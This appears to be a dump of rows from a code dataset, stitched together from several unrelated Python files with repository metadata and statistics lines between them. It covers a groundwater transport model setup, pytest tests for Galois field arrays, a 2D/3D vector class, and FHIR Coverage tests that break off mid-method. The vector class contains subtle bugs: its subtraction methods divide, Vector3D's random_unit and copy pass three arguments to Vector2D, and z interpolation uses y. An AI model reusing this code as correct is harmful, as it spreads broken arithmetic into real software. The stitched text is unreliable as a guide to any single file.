ELE_GAUSS_POINTS=3,
LINEAR_SOLVER=[2, 6, 1e-14, 1000, 1.0, 1, 2],
)
model.num.add_block(
main_key='NUMERICS',
PCS_TYPE='MASS_TRANSPORT',
LINEAR_SOLVER=[2, 6, 1e-14, 1000, 0.5, 1, 2],
ELE_GAUSS_POINTS=3,
)
model.tim.add_block(
main_key='TIME_STEPPING',
PCS_TYPE='GROUNDWATER_FLOW',
TIME_STEPS=[
[100, 10.0],
[200, 100],
],
TIME_END=21000.0,
TIME_START=0.0,
)
model.tim.add_block(
main_key='TIME_STEPPING',
PCS_TYPE='MASS_TRANSPORT',
TIME_STEPS=[
[100, 10.0],
[200, 100],
],
TIME_END=21000.0,
TIME_START=0.0,
)
model.out.add_block(
main_key='OUTPUT',
NOD_VALUES=[
['C'],
['Ca'],
['Mg'],
['Cl'],
['pH'],
['Calcite'],
['Dolomite(dis)'],
['Magnesite'],
],
GEO_TYPE=['POINT', 'POINT2'],
DAT_TYPE='TECPLOT',
)
model.out.add_block(
main_key='OUTPUT',
NOD_VALUES=[
['HEAD'],
['C'],
['Ca'],
['Mg'],
['Cl'],
['pH'],
['Calcite'],
['Dolomite(dis)'],
['Magnesite'],
],
GEO_TYPE=['POLYLINE', 'OUT_LINE'],
DAT_TYPE='TECPLOT',
TIM_TYPE=[
[0.0],
[100.0],
[1000.0],
[10000.0],
[21000.0],
],
)
model.out.add_block(
main_key='OUTPUT',
NOD_VALUES=[
['HEAD'],
['C'],
['Ca'],
['Mg'],
['Cl'],
['pH'],
['Eh'],
['Calcite'],
['Dolomite(dis)'],
['Magnesite'],
],
GEO_TYPE='DOMAIN',
DAT_TYPE='TECPLOT',
TIM_TYPE=[
[0.0],
[100.0],
[1000.0],
[10000.0],
[21000.0],
],
)
model.write_input()
model.run_model()
| 22.014706 | 49 | 0.620797 | 1,190 | 8,982 | 4.395798 | 0.121008 | 0.082585 | 0.123877 | 0.154846 | 0.852418 | 0.842286 | 0.821067 | 0.781495 | 0.771172 | 0.74307 | 0 | 0.043478 | 0.201069 | 8,982 | 407 | 50 | 22.068796 | 0.685479 | 0.002338 | 0 | 0.725926 | 0 | 0 | 0.234736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002469 | 0 | 0.002469 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f78c33499742edfcc8912ea22b1d1a87e60ca733 | 13,307 | py | Python | tests/fields/test_instantiation.py | Werni2A/galois | 97c35afdd1ad38705f2b1e643237fbd2f87bb6e3 | [
"MIT"
] | null | null | null | tests/fields/test_instantiation.py | Werni2A/galois | 97c35afdd1ad38705f2b1e643237fbd2f87bb6e3 | [
"MIT"
] | null | null | null | tests/fields/test_instantiation.py | Werni2A/galois | 97c35afdd1ad38705f2b1e643237fbd2f87bb6e3 | [
"MIT"
] | null | null | null | """
A pytest module to test instantiation of new Galois field arrays.
"""
import random
import pytest
import numpy as np
import galois
from ..helper import array_equal
DTYPES = galois.dtypes.DTYPES + [np.object_]
def test_cant_instantiate_GF():
v = [0, 1, 0, 1]
with pytest.raises(NotImplementedError):
a = galois.FieldArray(v)
class Test0D:
@pytest.mark.parametrize("type1", [int, list, tuple, np.array, galois.FieldArray])
def test_new(self, field, type1):
v = int(field.Random())
vt = convert_0d(v, type1, field)
a = field(vt)
assert type(a) is field
assert a == v
@pytest.mark.parametrize("type1", [int, list, tuple, np.array, galois.FieldArray])
def test_valid_dtype(self, field, type1):
v = int(field.Random())
vt = convert_0d(v, type1, field)
dtype = valid_dtype(field)
a = field(vt, dtype=dtype)
assert type(a) is field
assert a.dtype == dtype
assert a == v
@pytest.mark.parametrize("type1", [int, list, tuple, np.array, galois.FieldArray])
def test_invalid_dtype(self, field, type1):
v = int(field.Random())
vt = convert_0d(v, type1, field)
dtype = invalid_dtype(field)
with pytest.raises(TypeError):
a = field(vt, dtype=dtype)
@pytest.mark.parametrize("type1", [int, list, tuple, np.array])
def test_non_integer(self, field, type1):
v = float(field.order)
vt = convert_0d(v, type1, field)
with pytest.raises((TypeError, ValueError)):
a = field(vt)
@pytest.mark.parametrize("type1", [int, list, tuple, np.array])
def test_out_of_range_low(self, field, type1):
v = -1
vt = convert_0d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
@pytest.mark.parametrize("type1", [int, list, tuple, np.array])
def test_out_of_range_high(self, field, type1):
v = field.order
vt = convert_0d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
def test_copy_true(self, field):
v = int(field.Random(low=1))
va = np.array(v, dtype=field.dtypes[0])
a = field(va, copy=True)
assert type(a) is field
assert array_equal(a, v)
va = 1 # Change original array
assert array_equal(a, v)
def test_default_order_c(self, field):
v = int(field.Random())
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_default_order_f(self, field):
v = int(field.Random())
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_c(self, field):
v = int(field.Random())
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va, order="C")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_f(self, field):
v = int(field.Random())
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va, order="F")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_ndmin(self, field):
v = int(field.Random())
a = field(v, ndmin=3)
assert type(a) is field
assert a.shape == (1,1,1)
class Test1D:
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_new(self, field, type1):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
a = field(vt)
assert type(a) is field
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_valid_dtype(self, field, type1):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
dtype = valid_dtype(field)
a = field(vt, dtype=dtype)
assert type(a) is field
assert a.dtype == dtype
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_invalid_dtype(self, field, type1):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
dtype = invalid_dtype(field)
with pytest.raises(TypeError):
a = field(vt, dtype=dtype)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_non_integer(self, field, type1):
v = [int(field.Random()), float(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
with pytest.raises((TypeError, ValueError)):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_low(self, field, type1):
v = [int(field.Random()), -1, int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_high(self, field, type1):
v = [int(field.Random()), field.order, int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
def test_copy_true(self, field):
v = [int(field.Random(low=1)), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, dtype=field.dtypes[0])
a = field(va, copy=True)
assert type(a) is field
assert array_equal(a, v)
va[0] = 0 # Change original array
assert array_equal(a, v)
def test_default_order_c(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_default_order_f(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_c(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va, order="C")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_f(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va, order="F")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_ndmin(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
a = field(v, ndmin=3)
assert type(a) is field
assert a.shape == (1,1,4)
class Test2D:
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_new(self, field, type1):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
a = field(vt)
assert type(a) is field
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_valid_dtype(self, field, type1):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
dtype = valid_dtype(field)
a = field(vt, dtype=dtype)
assert type(a) is field
assert a.dtype == dtype
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_invalid_dtype(self, field, type1):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
dtype = invalid_dtype(field)
with pytest.raises(TypeError):
a = field(vt, dtype=dtype)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_non_integer(self, field, type1):
v = [[int(field.Random()), float(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
with pytest.raises((TypeError, ValueError)):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_low(self, field, type1):
v = [[int(field.Random()), -1], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_high(self, field, type1):
v = [[int(field.Random()), field.order], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
def test_copy_true(self, field):
v = [[int(field.Random(low=1)), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, dtype=field.dtypes[0])
a = field(va, copy=True)
assert type(a) is field
assert array_equal(a, v)
va[0][0] = 0 # Change original array
assert array_equal(a, v)
def test_default_order_c(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert not a.flags["F_CONTIGUOUS"]
def test_default_order_f(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert not a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_c(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va, order="C")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert not a.flags["F_CONTIGUOUS"]
def test_order_f(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va, order="F")
assert type(a) is field
assert not a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_ndmin(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
a = field(v, ndmin=3)
assert type(a) is field
assert a.shape == (1,2,2)
def convert_0d(v, type1, field):
if type1 is int:
vt = v
elif type1 in [list, tuple]:
vt = type1([v])
elif type1 is np.array and field.dtypes == [np.object_]:
vt = np.array(v, dtype=np.object_)
elif type1 is np.array:
vt = np.array(v)
elif type1 is galois.FieldArray:
vt = field(v)
else:
raise NotImplementedError
return vt
def convert_1d(v, type1, field):
if type1 is galois.FieldArray:
vt = field(v)
elif type1 is np.array and field.dtypes == [np.object_]:
vt = np.array(v, dtype=np.object_)
elif type1 is np.array:
vt = np.array(v)
else:
vt = type1(v)
return vt
def convert_2d(v, type1, field):
if type1 is galois.FieldArray:
vt = field(v)
elif type1 is np.array and field.dtypes == [np.object_]:
vt = np.array(v, dtype=np.object_)
elif type1 is np.array:
vt = np.array(v)
elif type1 in [list, tuple]:
vt = type1([type1([b for b in a]) for a in v])
else:
raise NotImplementedError
return vt
def valid_dtype(field):
return random.choice(field.dtypes)
def invalid_dtype(field):
return random.choice([dtype for dtype in DTYPES if dtype not in field.dtypes])
| 37.066852 | 105 | 0.596228 | 1,882 | 13,307 | 4.131775 | 0.050478 | 0.142876 | 0.178241 | 0.146605 | 0.947402 | 0.936728 | 0.934156 | 0.920653 | 0.914738 | 0.914738 | 0 | 0.013978 | 0.247313 | 13,307 | 358 | 106 | 37.170391 | 0.76238 | 0.028406 | 0 | 0.852843 | 0 | 0 | 0.030667 | 0 | 0 | 0 | 0 | 0 | 0.220736 | 1 | 0.140468 | false | 0 | 0.016722 | 0.006689 | 0.183946 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f79f79af309f580a1137b7246b19f55368becc00 | 12,230 | py | Python | vector_class.py | hamolicious/Ray-Marching | d4713b86ed7911b368137d455c288c9ef0b5bdee | [
"Apache-2.0"
] | 1 | 2021-06-08T21:07:33.000Z | 2021-06-08T21:07:33.000Z | vector_class.py | hamolicious/Ray-Marching | d4713b86ed7911b368137d455c288c9ef0b5bdee | [
"Apache-2.0"
] | null | null | null | vector_class.py | hamolicious/Ray-Marching | d4713b86ed7911b368137d455c288c9ef0b5bdee | [
"Apache-2.0"
] | null | null | null | from math import atan2, sqrt, degrees, radians, cos, sin
from random import randint
class Vector2D:
#region INIT
def _get_xy(self, args):
"""Generates a x and y from any input
Returns:
[tuple]: x, y
"""
number_of_args = len(args)
if number_of_args == 0 : return 0, 0 # no arguments
elif number_of_args == 2 : x, y = args ; return x, y # both x and y passed in
if number_of_args == 1: # one argument
arg_type = type(args[0])
if arg_type is float or arg_type is int: # single int or float argument
return args[0], args[0]
if arg_type is list or arg_type is tuple:
return args[0][0], args[0][1] # single list argument
if arg_type is Vector2D:
return args[0].x, args[0].y
def __init__(self, *args):
self.x, self.y = self._get_xy(args)
self.data = {}
#endregion
#region AUTO CREATE METHODS
def random_pos():
"""Returns a vector in normalised 0-1 space
Returns:
Vector2D: a vector in normal space
"""
return Vector2D(randint(0, 1000)/1000, randint(0, 1000)/1000)
def random_unit():
"""Generates a unit vector with a random heading
Returns:
Vector2D: unit vector
"""
pos = Vector2D(randint(-1000, 1000), randint(-1000, 1000))
pos.normalise()
return pos
def from_angle(angle):
"""Creates a unit vector with the same heading as the angle
Args:
angle (float): angle of direction in radians
Returns:
Vector2D: unit vector
"""
return Vector2D(cos(angle), sin(angle))
#endregion
#region CUSTOM METHODS
def get(self):
"""Gets the x and y components as an integer tuple
Returns:
tuple: contains x and y as integers
"""
return (int(self.x), int(self.y))
def set(self, *args):
"""Sets the x and y components
"""
x, y = self._get_xy(args)
self.x = x ; self.y = y
def copy(self):
"""Gets a copy of this vector
Returns:
Vector2D: a copy of this vector
"""
return Vector2D(self.x, self.y)
def clear(self):
"""Sets both components to 0
"""
self.x = self.y = 0
#endregion
#region CUSTOM MATHEMATICAL METHODS
def dist_sqrt(self, *args):
"""Gets the distance between this point and another (uses square root)
Returns:
float: distance
"""
x, y = self._get_xy(args)
return sqrt((self.x - x)**2 + (self.y - y)**2)
def dist(self, *args):
"""Gets the distance between this point and another (does not use square root)
Returns:
float: distance
"""
x, y = self._get_xy(args)
return (self.x - x)**2 + (self.y - y)**2
def get_heading_angle(self):
"""Returns the heading angle in radians assuming 0 is aligned with x
Returns:
float: angle in radians
"""
return atan2(self.x, self.y)
def get_magnitude(self):
"""Gets the magnitude/length of the vector
Returns:
float: magnitude
"""
return sqrt(self.x**2 + self.y**2)
def normalise(self):
"""Normalises this vector making it a unit vector
"""
mag = self.get_magnitude()
self.div(mag)
def normalize(self):
"""Normalises this vector making it a unit vector
"""
self.normalise()
def truncate(self, max_val):
"""Clamps the x and y components to be in range -max_val to max_val
Args:
max_val (float): max and min for each component
"""
if self.x > max_val : self.x = max_val
if self.y > max_val : self.y = max_val
if self.x < -max_val : self.x = -max_val
if self.y < -max_val : self.y = -max_val
def add(self, *args):
x, y = self._get_xy(args)
self.x += x ; self.y += y
def sub(self, *args):
x, y = self._get_xy(args)
self.x /= x ; self.y /= y
def mult(self, *args):
x, y = self._get_xy(args)
self.x *= x ; self.y *= y
def div(self, *args):
x, y = self._get_xy(args)
self.x /= x ; self.y /= y
def linear_interpolate(self, *args, t=0.5):
"""Linearly interpolates between current position and passed in position
Args:
t (float, optional): speed. Defaults to 0.5.
"""
x, y = self._get_xy(args)
x = self.x + t * (x - self.x);
y = self.y + t * (y - self.y);
self.set(x, y)
def dot_product(self, *args):
"""Dot product of this and another vector
Returns:
float: dot product result
"""
x, y = self._get_xy(args)
return sum([self.x * x, self.y * y])
#endregion
#region MAGIC METHODS
def __iadd__(self, *args):
x, y = self._get_xy(args)
self.x += x ; self.y += y
return self
def __isub__(self, *args):
x, y = self._get_xy(args)
self.x /= x ; self.y /= y
return self
def __imul__(self, *args):
x, y = self._get_xy(args)
self.x *= x ; self.y *= y
return self
def __idiv__(self, *args):
x, y = self._get_xy(args)
self.x /= x ; self.y /= y
return self
def __add__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x + x, self.y + y)
def __sub__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x - x, self.y - y)
def __mul__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x * x, self.y * y)
def __div__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x / x, self.y / y)
#endregion
class Vector3D:
#region INIT
def _get_xyz(self, args):
"""Generates a x, y and z from any input
Returns:
[tuple]: x, y, z
"""
number_of_args = len(args)
if number_of_args == 0 : return 0, 0, 0 # no arguments
elif number_of_args == 3 : x, y, z = args ; return x, y, z # both x and y passed in
if number_of_args == 1: # one argument
arg_type = type(args[0])
if arg_type is float or arg_type is int: # single int or float argument
return args[0], args[0], args[0]
if arg_type is list or arg_type is tuple:
return args[0][0], args[0][1], args[0][2] # single list argument
if arg_type is Vector3D:
return args[0].x, args[0].y, args[0].z
def __init__(self, *args):
self.x, self.y, self.z = self._get_xyz(args)
self.data = {}
#endregion
#region AUTO CREATE METHODS
def random_pos():
"""Returns a vector in normalised 0-1 space
Returns:
Vector2D: a vector in normal space
"""
return Vector3D(randint(0, 1000)/1000, randint(0, 1000)/1000, randint(0, 1000)/1000)
def random_unit():
"""Generates a unit vector with a random heading
Returns:
Vector2D: unit vector
"""
pos = Vector2D(randint(-1000, 1000), randint(-1000, 1000), randint(-1000, 1000))
pos.normalise()
return pos
#endregion
#region CUSTOM METHODS
def get(self):
"""Gets the x and y components as an integer tuple
Returns:
tuple: contains x and y as integers
"""
return (int(self.x), int(self.y), int(self.z))
def set(self, *args):
"""Sets the x and y components
"""
x, y, z = self._get_xyz(args)
self.x = x ; self.y = y ; self.z = z
def copy(self):
"""Gets a copy of this vector
Returns:
Vector2D: a copy of this vector
"""
return Vector2D(self.x, self.y, self.z)
def clear(self):
"""Sets both components to 0
"""
self.x = self.y = self.z = 0
#endregion
#region CUSTOM MATHEMATICAL METHODS
def dist_sqrt(self, *args):
"""Gets the distance between this point and another (uses square root)
Returns:
float: distance
"""
x, y, z = self._get_xyz(args)
return sqrt((self.x - x)**2 + (self.y - y)**2 + (self.z - z)**2)
def dist(self, *args):
"""Gets the distance between this point and another (does not use square root)
Returns:
float: distance
"""
x, y, z = self._get_xyz(args)
return (self.x - x)**2 + (self.y - y)**2 + (self.z - z)**2
def get_magnitude(self):
"""Gets the magnitude/length of the vector
Returns:
float: magnitude
"""
return sqrt(self.x**2 + self.y**2 + self.z**2)
def normalise(self):
"""Normalises this vector making it a unit vector
"""
mag = self.get_magnitude()
self.div(mag)
def normalize(self):
"""Normalises this vector making it a unit vector
"""
self.normalise()
def truncate(self, max_val):
"""Clamps the x and y components to be in range -max_val to max_val
Args:
max_val (float): max and min for each component
"""
if self.x > max_val : self.x = max_val
if self.y > max_val : self.y = max_val
if self.z > max_val : self.z = max_val
if self.x < -max_val : self.x = -max_val
if self.y < -max_val : self.y = -max_val
if self.z < -max_val : self.z = -max_val
def add(self, *args):
x, y, z = self._get_xyz(args)
self.x += x ; self.y += y ; self.z += z
def sub(self, *args):
x, y, z = self._get_xyz(args)
self.x /= x ; self.y /= y ; self.z /= z
def mult(self, *args):
x, y, z = self._get_xyz(args)
self.x *= x ; self.y *= y ; self.z *= z
def div(self, *args):
x, y, z = self._get_xyz(args)
self.x /= x ; self.y /= y ; self.z /= z
def linear_interpolate(self, *args, t=0.5):
"""Linearly interpolates between current position and passed in position
Args:
t (float, optional): speed. Defaults to 0.5.
"""
x, y, z = self._get_xyz(args)
x = self.x + t * (x - self.x);
y = self.y + t * (y - self.y);
z = self.z + t * (y - self.z);
self.set(x, y, z)
#endregion
#region MAGIC METHODS
def __iadd__(self, *args):
x, y, z = self._get_xyz(args)
self.x += x ; self.y += y ; self.z += z
return self
def __isub__(self, *args):
x, y, z = self._get_xyz(args)
self.x /= x ; self.y /= y ; self.z /= z
return self
def __imul__(self, *args):
x, y, z = self._get_xyz(args)
self.x *= x ; self.y *= y ; self.z *= z
return self
def __idiv__(self, *args):
x, y, z = self._get_xyz(args)
self.x /= x ; self.y /= y ; self.z /= z
return self
def __add__(self, *args):
x, y, z = self._get_xyz(args)
return Vector3D(self.x + x, self.y + y, self.z + z)
def __sub__(self, *args):
x, y, z = self._get_xyz(args)
return Vector3D(self.x - x, self.y - y, self.z - z)
def __mul__(self, *args):
x, y, z = self._get_xyz(args)
return Vector3D(self.x * x, self.y * y, self.z * z)
def __div__(self, *args):
x, y, z = self._get_xyz(args)
return Vector3D(self.x / x, self.y / y, self.z / z)
#endregion
| 28.574766 | 93 | 0.50785 | 1,700 | 12,230 | 3.525294 | 0.086471 | 0.045053 | 0.03404 | 0.045053 | 0.896546 | 0.888537 | 0.88036 | 0.847155 | 0.831303 | 0.821125 | 0 | 0.023229 | 0.373426 | 12,230 | 427 | 94 | 28.641686 | 0.758841 | 0.25184 | 0 | 0.715 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285 | false | 0 | 0.01 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
e3ea0df9d938483bce03ff5c5db100fb6a56f3a0 | 12,475 | py | Python | fhirclient/models/coverage_tests.py | mdx-dev/client-py | f6c16c9bd386c5b05d69753b89c6519d568814ac | [
"Apache-2.0"
] | null | null | null | fhirclient/models/coverage_tests.py | mdx-dev/client-py | f6c16c9bd386c5b05d69753b89c6519d568814ac | [
"Apache-2.0"
] | null | null | null | fhirclient/models/coverage_tests.py | mdx-dev/client-py | f6c16c9bd386c5b05d69753b89c6519d568814ac | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b on 2019-01-22.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import coverage
from .fhirdate import FHIRDate
class CoverageTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Coverage", js["resourceType"])
return coverage.Coverage(js)
def testCoverage1(self):
inst = self.instantiate_from("coverage-example-2.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage1(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage1(inst2)
def implCoverage1(self, inst):
self.assertEqual(inst.class_fhir[0].name, "Western Airlines")
self.assertEqual(inst.class_fhir[0].type.coding[0].code, "group")
self.assertEqual(inst.class_fhir[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[0].value, "WESTAIR")
self.assertEqual(inst.class_fhir[1].name, "Full Coverage: Medical, Dental, Pharmacy, Vision, EHC")
self.assertEqual(inst.class_fhir[1].type.coding[0].code, "plan")
self.assertEqual(inst.class_fhir[1].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[1].value, "BG4352")
self.assertEqual(inst.class_fhir[2].name, "Platinum")
self.assertEqual(inst.class_fhir[2].type.coding[0].code, "subplan")
self.assertEqual(inst.class_fhir[2].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[2].value, "D15C9")
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.end.date, FHIRDate("2018-12-31").date)
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.end.as_json(), "2018-12-31")
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.start.date, FHIRDate("2018-01-01").date)
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.start.as_json(), "2018-01-01")
self.assertEqual(inst.costToBeneficiary[0].exception[0].type.coding[0].code, "retired")
self.assertEqual(inst.costToBeneficiary[0].exception[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-coverage-financial-exception")
self.assertEqual(inst.costToBeneficiary[0].type.coding[0].code, "gpvisit")
self.assertEqual(inst.costToBeneficiary[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-copay-type")
self.assertEqual(inst.costToBeneficiary[0].valueMoney.currency, "USD")
self.assertEqual(inst.costToBeneficiary[0].valueMoney.value, 20.0)
self.assertEqual(inst.dependent, "1")
self.assertEqual(inst.id, "7546D")
self.assertEqual(inst.identifier[0].system, "http://xyz.com/codes/identifier")
self.assertEqual(inst.identifier[0].value, "AB98761")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.network, "5")
self.assertEqual(inst.order, 2)
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.period.start.date, FHIRDate("2011-03-17").date)
self.assertEqual(inst.period.start.as_json(), "2011-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.subscriberId, "AB9876")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActCode")
def testCoverage2(self):
inst = self.instantiate_from("coverage-example-selfpay.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage2(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage2(inst2)
def implCoverage2(self, inst):
self.assertEqual(inst.id, "SP1234")
self.assertEqual(inst.identifier[0].system, "http://hospitalx.com/selfpayagreement")
self.assertEqual(inst.identifier[0].value, "SP12345678")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of a Self Pay Agreement.</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "pay")
self.assertEqual(inst.type.coding[0].display, "PAY")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-selfpay")
def testCoverage3(self):
inst = self.instantiate_from("coverage-example-ehic.json")
